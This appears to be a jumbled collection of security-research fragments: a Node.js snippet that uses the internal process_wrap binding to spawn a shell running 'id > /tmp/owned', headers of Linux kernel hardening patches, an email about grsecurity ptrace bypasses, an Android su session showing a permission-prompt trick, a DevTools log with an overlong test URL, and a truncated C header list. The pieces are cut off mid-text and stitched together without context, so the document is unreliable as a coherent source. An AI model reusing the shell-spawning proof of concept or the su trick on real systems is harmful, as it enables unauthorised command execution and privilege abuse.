var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({
  file: '/bin/sh',
  args: ['sh', '-c', 'id > /tmp/owned'],
  cwd: null,
  windowsVerbatimArguments: false,
  detached: false,
  envPairs: env_,
  stdio: [{type:'ignore'}, {type:'ignore'}, {type:'ignore'}]
});
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl

This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses

Hi!

While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.
From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 2 Jan 2016 08:09:19 +0100
Subject: [PATCH] fs: allow unprivileged chroot()

Allow unprivileged processes to chroot() themselves, under the
following conditions:
- The caller must have set NO_NEW_PRIVS to prevent him from
  invoking setuid/setgid/setcap executables in the chroot that
From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Fri, 14 Aug 2015 17:47:01 +0200
Subject: [PATCH] drivers/tty: require read access for controlling terminal

This is mostly a hardening fix, given that write-only access to other
users' ttys is usually only given through setgid tty executables.

Signed-off-by: Jann Horn <jann@thejh.net>
---
https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none
root@android:/ # su 1000
system@android:/ $ cd /tmp
system@android:/tmp $ cat > foo
/system/bin/sh
1
rubbish
system@android:/tmp $ su -c "$(cat foo)"
# press "deny" now with "remember" option activated
Permission denied
1|system@android:/tmp $ su
zzzzDevToolsAPI.dispatchMessage({"method":"Network.responseReceived","params":{"requestId":"1191.4","frameId":"1191.1","loaderId":"1191.3","timestamp":125386.24326,"type":"Document","response":{"url":"http://thejh.net/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAthisisaneviltest","status":404,"statusText":"Not Found","headers":{"Date":"Tue, 14 Jul 2015 12:48:11 GMT","Cache-Control":"no-transform","Server":"lighttpd/1.4.35","Content-Length":"345","Content-Type":"text/html"},"mimeType":"text/html","connectionReused":false,"connectionId":21596,"encodedDataLength":-1,"fromDiskCache":false,"fromServiceWorker":false,"timing":{"requestTime":125386.186667,"proxyStart":-1,"proxyEnd":-1,"dnsStart":2.04599999415223,"dnsEnd":2.06400000024587,"connectStart":2.06400000024587,"connectEnd":29.9769999983255,"sslStart":-1,"sslEnd":-1,"serviceWorkerFetchStart":-1,"serviceWorkerFetchReady":-1,"serviceWorkerFetchEnd":-1,"sendStart":30.19000000 |
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <sys/stat.h>